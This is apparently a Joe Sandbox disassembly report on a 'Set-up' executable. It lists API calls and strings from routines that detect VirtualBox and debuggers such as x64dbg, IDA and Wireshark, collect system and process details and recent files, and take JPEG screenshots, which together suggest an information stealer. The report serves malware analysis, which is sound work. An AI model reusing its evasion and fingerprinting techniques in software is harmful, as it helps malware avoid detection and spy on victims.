4fb3f8 105421->105422 105423 4fb3a8 105421->105423 105431 4fb0b0 105422->105431 105439 3b1420 31 API calls 105423->105439 105426 4fb3bc 105428 4fb41d 105426->105428 105429 4fb0b0 4 API calls 105426->105429 105427 4fb40f 105428->105427 105430 4fb3db free 105429->105430 105432 4fb118 _errno 105431->105432 105433 4fb0c1 105431->105433 105434 4fb10d 105432->105434 105433->105432 105435 4fb0cf 105433->105435 105434->105427 105436 4fb0e7 memcpy 105435->105436 105440 4fb020 105435->105440 105436->105434 105439->105426 105441 4fb02e 105440->105441 105442 4fb052 105440->105442 105443 4fb06c _errno 105441->105443 105444 4fb036 realloc 105441->105444 105442->105434 105442->105436 105443->105442 105444->105442 105446 23ab0 AcquireSRWLockExclusive 105447 23ac3 105446->105447 105448 23acb ReleaseSRWLockExclusive 105446->105448 105447->105448 105449 23ad6 105447->105449 105453 3d7b0 105449->105453 105451 23aeb 105452 23af3 ReleaseSRWLockExclusive 105451->105452 105454 3d7d9 105453->105454 105455 3d7be FreeLibrary 105453->105455 105456 3d7e0 WSACleanup 105454->105456 105457 3d7de 105454->105457 105455->105454 105457->105451 105458 595b0 105459 595c8 105458->105459 105461 595fd 105458->105461 105460 5a150 73 API calls 105459->105460 105459->105461 105460->105461 105462 31139 105463 31148 105462->105463 105466 31512 105463->105466 105469 31161 105463->105469 105464 31fb0 105473 30f00 105464->105473 105489 34940 82 API calls 105464->105489 105465 31f58 105487 30150 51 API calls 105465->105487 105467 30f69 105466->105467 105486 322d0 52 API calls 105466->105486 105467->105464 105467->105465 105467->105473 105469->105467 105485 30150 51 API calls 105469->105485 105480 30f21 105473->105480 105484 30150 51 API calls 105473->105484 105475 31fa6 105475->105473 105476 3208a 105475->105476 105478 275a0 48 API calls 105475->105478 105475->105480 105490 33900 49 API calls 105476->105490 105481 32057 105478->105481 105479 31f61 105479->105475 105488 5d4d0 49 API calls 105479->105488 105482 275a0 48 API calls 105481->105482 105482->105476 105484->105480 105485->105467 105486->105467 105487->105479 105488->105475 105489->105475 105490->105473 105491 229ff FindFirstFileA 105492 22a31 105491->105492 105493 22a5c RegOpenKeyExA 105492->105493 105494 22a93 105493->105494 105495 22ade CharUpperA strstr 105494->105495 105496 22b0e 105495->105496 105497 22b39 CreateToolhelp32Snapshot Process32First 105496->105497 105498 22b94 105497->105498 105499 22ba5 QueryFullProcessImageNameA 105497->105499 105498->105499 105501 22bb0 Process32Next 105498->105501 105502 22c3b CloseHandle strstr 105499->105502 105501->105498 105501->105499 105503 22c68 105502->105503 105504 22c93 CreateToolhelp32Snapshot Process32First 105503->105504 105505 22cef strncpy 105504->105505 105508 22d99 105504->105508 105506 22d31 strstr 105505->105506 105507 22d4b strstr 105506->105507 105506->105508 105507->105508 105509 22d65 strstr 105507->105509 105510 22df1 CloseHandle EnumWindows 105508->105510 105509->105508 105511 22d7f strstr 105509->105511 105513 22e30 105510->105513 105511->105508 105512 22daf Process32Next 105511->105512 105512->105505 105512->105508 105514 4f38f0 105515 4f391a 105514->105515 105516 4f3926 105515->105516 105517 3a8f70 8 API calls 105515->105517 105518 4f392f 105517->105518 105532 3b12c0 105518->105532 105521 4f3966 105522 3a8f70 8 API calls 105523 4f396f GetVersion CryptAcquireContextA 105522->105523 105524 4f39c6 CryptGenRandom CryptReleaseContext 105523->105524 105525 4f3a10 GetLastError __acrt_iob_func 105523->105525 105527 4f3a04 105524->105527 105528 4f3a50 GetLastError __acrt_iob_func 105524->105528 105536 3ab500 40 API calls 105525->105536 105537 3ab500 40 API calls 105528->105537 105529 4f3a39 _time32 105531 4f3a79 105531->105529 105533 3b12cc 105532->105533 105538 3ae050 105533->105538 105535 3b12fa 105535->105521 105535->105522 105536->105529 105537->105531 105539 3ae09d localeconv localeconv 105538->105539 105540 3af886 _errno 105538->105540 105571 3ae0ce 105539->105571 105632 3ae503 105540->105632 105541 3af993 105542 3ae214 105541->105542 105547 3af9b5 realloc 105541->105547 105542->105535 105543 3ae300 strlen 105543->105571 105544 3ae388 105546 3ae4b0 105544->105546 105564 3af5b6 105544->105564 105545 3ae146 isspace 105545->105571 105557 3b0178 105546->105557 105558 3af603 105546->105558 105567 3aecc8 _errno _errno 105546->105567 105577 3aeb52 105546->105577 105578 3aed17 _errno 105546->105578 105585 3aed02 isspace 105546->105585 105587 3ae527 105546->105587 105592 3ae6b9 105546->105592 105596 3b00b8 ungetc 105546->105596 105546->105632 105547->105542 105548 3ae2d1 105551 3ae2f1 free 105548->105551 105552 3ae2e1 free 105548->105552 105549 3ae176 isspace 105549->105571 105550 3ae2c0 free 105550->105548 105550->105550 105551->105542 105552->105551 105553 3af54c 105565 3b0250 ungetc 105553->105565 105566 3af564 105553->105566 105554 3ae18e 105559 3aed90 ungetc 105554->105559 105570 3ae1a6 105554->105570 105555 3af674 105555->105542 105562 3af6b0 free 105555->105562 105572 3ae1e1 105555->105572 105556 3ae243 105563 3ae261 isspace 105556->105563 105582 3ae28c 105556->105582 105569 3b0184 free 105557->105569 105557->105572 105558->105542 105568 3af630 free 105558->105568 105558->105572 105559->105542 105560 3ae1f1 free 105561 3ae205 free 105560->105561 105561->105542 105562->105562 105562->105572 105563->105556 105614 3ae26f 105563->105614 105564->105572 105584 3af5d0 free 105564->105584 105574 3b0274 strtoul 105565->105574 105566->105542 105566->105572 105576 3af5a0 free 105566->105576 105567->105546 105568->105568 105568->105572 105569->105569 105569->105572 105570->105572 105573 3ae1d0 free 105570->105573 105571->105543 105571->105544 105571->105545 105571->105549 105571->105553 105571->105554 105571->105555 105571->105556 105580 3ae582 105571->105580 105581 3ae560 isspace 105571->105581 105571->105632 105572->105560 105572->105561 105573->105572 105573->105573 105574->105542 105574->105632 105575 3afed7 tolower 105575->105542 105575->105632 105576->105572 105576->105576 105593 3aeb63 105577->105593 105594 3ae81a 105577->105594 105578->105546 105578->105558 105579 3afeb6 isxdigit 105579->105632 105580->105542 105580->105572 105591 3ae5a0 free 105580->105591 105581->105571 105582->105548 105582->105550 105583 3b0742 ungetc 105583->105582 105584->105572 105584->105584 105585->105546 105590 3ae626 _errno 105585->105590 105586 3b11a4 ungetc 105586->105632 105587->105572 105600 3ae538 free 105587->105600 105588 3ae765 105588->105542 105604 3b08f9 105588->105604 105588->105632 105589 3b03d9 tolower 105589->105632 105590->105546 105591->105572 105591->105591 105592->105542 105592->105588 105602 3ae701 malloc 105592->105602 105592->105632 105593->105542 105597 3aebac malloc 105593->105597 105593->105632 105594->105542 105598 3ae86d malloc 105594->105598 105594->105632 105595 3b0438 tolower 105595->105542 105595->105632 105596->105546 105597->105542 105605 3aebd2 105597->105605 105598->105542 105606 3ae897 105598->105606 105599 3b0927 105599->105542 105599->105572 105612 3b0958 free 105599->105612 105600->105572 105600->105600 105601 3aea53 malloc 105601->105542 105618 3ae8c7 105601->105618 105602->105542 105609 3ae71f 105602->105609 105603 3b08d7 ungetc 105603->105632 105604->105542 105604->105572 105617 3b0911 free 105604->105617 105611 3aebe6 malloc 105605->105611 105605->105618 105613 3ae8ab malloc 105606->105613 105606->105618 105607 3ae96f realloc 105607->105632 105608 3aeb2d isspace 105608->105632 105616 3ae733 malloc 105609->105616 105620 3ae74f 105609->105620 105610 3ae7ac isspace 105610->105632 105611->105618 105612->105572 105612->105612 105613->105618 105614->105582 105614->105583 105615 3aea85 malloc 105615->105618 105616->105620 105617->105572 105617->105617 105618->105615 105618->105632 105619 3b0e3e ungetc 105619->105632 105620->105588 105621 3b78b0 IsDBCSLeadByteEx MultiByteToWideChar MultiByteToWideChar _errno 105621->105632 105622 3afc5e strtol 105622->105542 105622->105632 105623 3af293 strtoll 105623->105542 105623->105632 105625 3b0e5d realloc 105625->105632 105626 3b0d20 _errno 105626->105632 105627 3aec9a realloc 105627->105632 105628 3b0006 ungetc 105628->105632 105629 3b0054 realloc 105629->105632 105630 3afc10 realloc 105630->105632 105631 3aed2c _errno 105631->105572 105634 3aed43 105631->105634 105632->105540 105632->105541 105632->105542 105632->105555 105632->105565 105632->105574 105632->105575 105632->105579 105632->105586 105632->105587 105632->105589 105632->105595 105632->105599 105632->105601 105632->105603 105632->105607 105632->105608 105632->105610 105632->105614 105632->105619 105632->105621 105632->105622 105632->105623 105632->105625 105632->105626 105632->105627 105632->105628 105632->105629 105632->105630 105632->105631 105633 3aed5e _errno 105632->105633 105638 3ab1a0 7 API calls 105632->105638 105633->105572 105636 3aed75 105633->105636 105635 3aed48 free 105634->105635 105635->105572 105635->105635 105637 3aed78 free 105636->105637 105637->105572 105637->105637 105638->105632
                          APIs
                            • Part of subcall function 0003D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,000301B1), ref: 0003D8E2
                          • setsockopt.WS2_32(?,00000029,0000001B,00000000,00000004), ref: 0005A670
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A6A1
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A6AB
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0005A6AF
                            • Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D0A1
                            • Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0A9
                            • Part of subcall function 0003D090: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0CD
                            • Part of subcall function 0003D090: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D0D7
                            • Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000A), ref: 0003D381
                            • Part of subcall function 0003D090: strrchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000000D), ref: 0003D3A2
                            • Part of subcall function 0003D090: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0003D3BF
                            • Part of subcall function 0003D090: GetLastError.KERNEL32 ref: 0003D3C9
                            • Part of subcall function 0003D090: SetLastError.KERNEL32(00000000), ref: 0003D3D4
                            • Part of subcall function 00064F40: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00064F9E
                          • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0005A831
                          • WSAGetLastError.WS2_32 ref: 0005A854
                          • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0005A97A
                          • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0005A9A6
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0005AB0F
                          • htons.WS2_32(?), ref: 0005AC01
                          • getsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 0005AC38
                          • setsockopt.WS2_32(?,0000FFFF,00001001,00004020,00000004), ref: 0005AC64
                          • WSAGetLastError.WS2_32 ref: 0005ACDC
                          • WSAGetLastError.WS2_32 ref: 0005ADF5
                          • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000025), ref: 0005AE9D
                          • htons.WS2_32(?), ref: 0005AEDB
                          • bind.WS2_32(?,00000002,00000010), ref: 0005AEF5
                          • WSAGetLastError.WS2_32 ref: 0005AFB9
                          • htons.WS2_32(?), ref: 0005AFFC
                          • bind.WS2_32(?,?,?), ref: 0005B014
                          • WSAGetLastError.WS2_32 ref: 0005B056
                          • htons.WS2_32(?), ref: 0005B0D2
                          • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,0000000A), ref: 0005B0EA
                          Strings
                          • Local Interface %s is ip %s using address family %i, xrefs: 0005AE60
                          • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0005AD0A
                          • Name '%s' family %i resolved to '%s' family %i, xrefs: 0005ADAC
                          • Bind to local port %d failed, trying next, xrefs: 0005AFE5
                          • Could not set TCP_NODELAY: %s, xrefs: 0005A871
                          • @, xrefs: 0005AC42
                          • Trying %s:%d..., xrefs: 0005A7C2, 0005A7DE
                          • Couldn't bind to '%s' with errno %d: %s, xrefs: 0005AE1F
                          • Local port: %hu, xrefs: 0005AF28
                          • Trying [%s]:%d..., xrefs: 0005A689
                          • cf-socket.c, xrefs: 0005A5CD, 0005A735
                          • bind failed with errno %d: %s, xrefs: 0005B080
                          • @, xrefs: 0005A8F4
                          • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0005A6CE
                          • cf_socket_open() -> %d, fd=%d, xrefs: 0005A796
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: ErrorLast$_errno$htonssetsockopt$bindgetsockoptstrrchr$CounterPerformanceQuery__sys_errlist__sys_nerrstrchrstrcpystrlenstrtoul
                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                          • API String ID: 2815861332-2373386790
                          • Opcode ID: 4af9e76397fb7b77198466083f8ee1ccc61eeed97fce41456edc610d1dc2f5f7
                          • Instruction ID: faf7cfa551559b860ac4139e15a353e72e2024d1396d59298d7002fdc90a6b94
                          • Opcode Fuzzy Hash: 4af9e76397fb7b77198466083f8ee1ccc61eeed97fce41456edc610d1dc2f5f7
                          • Instruction Fuzzy Hash: 3E6206716083409BE7218F14CC45BABB7F9BF86315F044629FD8997292E771E849CB93

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 445 229ff-22a2f FindFirstFileA 446 22a31-22a36 445->446 447 22a38 445->447 448 22a3d-22a91 call 4f5d10 call 4f5da0 RegOpenKeyExA 446->448 447->448 453 22a93-22a98 448->453 454 22a9a 448->454 455 22a9f-22b0c call 4f5d10 call 4f5da0 CharUpperA strstr 453->455 454->455 461 22b15 455->461 462 22b0e-22b13 455->462 463 22b1a-22b92 call 4f5d10 call 4f5da0 CreateToolhelp32Snapshot Process32First 461->463 462->463 468 22b94-22ba3 463->468 469 22bcc-22c66 QueryFullProcessImageNameA CloseHandle strstr 463->469 472 22bb0-22bca Process32Next 468->472 473 22ba5-22bae 468->473 475 22c68-22c6d 469->475 476 22c6f 469->476 472->468 472->469 473->469 477 22c74-22ce9 call 4f5d10 call 4f5da0 CreateToolhelp32Snapshot Process32First 475->477 476->477 482 22dcf-22e2e call 4f5d10 call 4f5da0 CloseHandle EnumWindows 477->482 483 22cef-22d49 strncpy strstr 477->483 492 22e30-22e35 482->492 493 22e37 482->493 487 22d4b-22d63 strstr 483->487 488 22d99-22dad 483->488 487->488 490 22d65-22d7d strstr 487->490 488->482 490->488 494 22d7f-22d97 strstr 490->494 496 22e3c-22ed6 call 4f5d10 call 4f5da0 492->496 493->496 494->488 497 22daf-22dc9 Process32Next 494->497 503 22eea 496->503 504 22ed8-22ee1 496->504 497->482 497->483 506 22eef-22f16 call 4f5d10 call 4f5da0 503->506 504->503 505 22ee3-22ee8 504->505 505->506
                          APIs
                          • FindFirstFileA.KERNELBASE ref: 00022A27
                          • RegOpenKeyExA.KERNELBASE ref: 00022A8A
                          • CharUpperA.USER32 ref: 00022AEF
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022B05
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00022B6D
                          • Process32First.KERNEL32 ref: 00022B88
                          • Process32Next.KERNEL32 ref: 00022BC0
                          • QueryFullProcessImageNameA.KERNELBASE ref: 00022C26
                          • CloseHandle.KERNELBASE ref: 00022C49
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022C5F
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00022CC4
                          • Process32First.KERNEL32 ref: 00022CDF
                          • strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00022D0D
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D42
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D5C
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D76
                          • strstr.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00022D90
                          • Process32Next.KERNEL32 ref: 00022DBF
                          • CloseHandle.KERNELBASE ref: 00022DFC
                          • EnumWindows.USER32 ref: 00022E21
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strstr$Process32$First$CloseCreateHandleNextSnapshotToolhelp32$CharEnumFileFindFullImageNameOpenProcessQueryUpperWindowsstrncpy
                          • String ID: 0$C:\USERS\PUBLIC\$C:\Windows\System32\VBox*.dll$SYSTEM\ControlSet001\Services\VBoxSF$WINDBG.EXE$dbg$dbg_sec$dbg_third$ida.exe$procmon.exe$public_check$vbox_first$vbox_second$wireshark.exe$x64dbg.exe$yadro
                          • API String ID: 515599682-3783588604
                          • Opcode ID: e2227a072d71184c8088c52f2673ad0fb2099f9145ddcef954241ca859890dff
                          • Instruction ID: 9d482918ccd6704ab61116c41d72b09297fb4c276226b0b3758e065d60b59adf
                          • Opcode Fuzzy Hash: e2227a072d71184c8088c52f2673ad0fb2099f9145ddcef954241ca859890dff
                          • Instruction Fuzzy Hash: 9AE1D5B49053199FCB50EFA8D9856AEBBF4EF84304F50886DE588DB350EB749984CF42

                          Control-flow Graph

                          APIs
                          • GetSystemInfo.KERNELBASE ref: 00022579
                            • Part of subcall function 004F5BB0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00022589), ref: 004F5BC5
                          • GlobalMemoryStatusEx.KERNELBASE ref: 000225CC
                          • GetLogicalDriveStringsA.KERNEL32 ref: 00022619
                          • GetDriveTypeA.KERNELBASE ref: 00022647
                          • GetDiskFreeSpaceExA.KERNELBASE ref: 0002267E
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00022749
                          • KiUserCallbackDispatcher.NTDLL ref: 000227E2
                          • SHGetKnownFolderPath.SHELL32 ref: 0002286D
                          • wcscpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000228BE
                          • wcscat.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000228D4
                          • FindFirstFileW.KERNELBASE ref: 000228F8
                          • FindNextFileW.KERNELBASE ref: 0002291F
                          • K32EnumProcesses.KERNEL32 ref: 0002296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: DriveFileFind$CallbackDiskDispatcherEnumFirstFolderFreeGlobalInfoKnownLogicalMemoryNextPathProcessesSpaceStatusStringsSystemTypeUsermallocstrlenwcscatwcscpy
                          • String ID: @$Num_displays$Num_processor$Num_ram$`$all$drivers$free$name$processes$recent_files$resolution_x$resolution_y$uptime_minutes
                          • API String ID: 2116500361-3337672980
                          • Opcode ID: 9d13a4d626cd5b7d4e90a80cda2eec14cba6f4ccb40a78441ffacc071ec70146
                          • Instruction ID: 37269832d3cde22e2c782d8dfc67a1bb1f88f080e6162902d49fde914f5086d8
                          • Opcode Fuzzy Hash: 9d13a4d626cd5b7d4e90a80cda2eec14cba6f4ccb40a78441ffacc071ec70146
                          • Instruction Fuzzy Hash: C0D1A2B49057199FCB40EFA9C5856AEBBF0BF84304F40896EE598D7301E7749A84CF92

                          Control-flow Graph

                          APIs
                          • LoadLibraryA.KERNEL32 ref: 003B8DAF
                          • GetProcAddress.KERNEL32 ref: 003B8DD3
                          • GetProcAddress.KERNEL32 ref: 003B8DE9
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B8FCF
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B8FF0
                          • FreeLibrary.KERNEL32 ref: 003B8FF8
                            • Part of subcall function 003B7E20: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003B7E6D
                            • Part of subcall function 003B7E20: wcscmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 003B7EB6
                            • Part of subcall function 003B7E20: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 003B7ED8
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B9077
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B9098
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B90AF
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B90D0
                          • FreeLibrary.KERNEL32 ref: 003B90D8
                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B90F7
                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003B9118
                          • FreeLibrary.KERNEL32 ref: 003B9120
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: Library__acrt_iob_funcfwrite$Free$AddressProc$Loadfreemallocwcscmp
                          • String ID: !$Failed to allocate buffer$Failed to create GDI+ bitmap$Failed to get JPEG encoder CLSID$Failed to load GDI+ functions$Failed to load gdiplus.dll$GdipCreateBitmapFromHBITMAP$GdipSaveImageToStream$gdiplus.dll$image/jpeg
                          • API String ID: 4185073593-1943330374
                          • Opcode ID: 34f086052969a3212433401388879f484fcf6ba90e0b1598f30782816bdb7f53
                          • Instruction ID: 1f148ed5bb800fba2877af19ef99d6326cf288741dca5f35c6c77ed423341467
                          • Opcode Fuzzy Hash: 34f086052969a3212433401388879f484fcf6ba90e0b1598f30782816bdb7f53
                          • Instruction Fuzzy Hash: 955138B09093049FDB10AF68D8483AEBFF5FF45314F01896ED98887641DBBA9985CF52

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 949 3a8e90-3a8eb8 _open 950 3a8eba-3a8ec7 949->950 951 3a8eff-3a8f2c call 3a9f70 949->951 952 3a8ec9 950->952 953 3a8ef3-3a8efa _exit 950->953 958 3a8f39-3a8f51 _write 951->958 955 3a8ecb-3a8ecd 952->955 956 3a8ee2-3a8ef1 952->956 953->951 959 3a8ed3-3a8ed6 955->959 960 4fdfc0-4fdfd7 955->960 956->952 956->953 961 3a8f53-3a8f5e _close 958->961 962 3a8f30-3a8f37 958->962 959->956 965 3a8ed8 959->965 963 4fdfda-4fe00f CryptAcquireContextA 960->963 964 4fdfd9 960->964 961->950 962->958 962->961 966 4fe029-4fe04b CryptGenRandom 963->966 967 4fe011-4fe01f 963->967 965->956 969 4fe04d-4fe054 966->969 970 4fe056-4fe06b CryptReleaseContext 966->970 968 4fe025-4fe028 967->968 969->970 971 4fe06d-4fe082 CryptReleaseContext 969->971 970->967 971->968
                          APIs
                          • _open.MSVCRT ref: 003A8EAD
                          • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003A8EFA
                          • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003A8F4A
                          • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 003A8F59
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
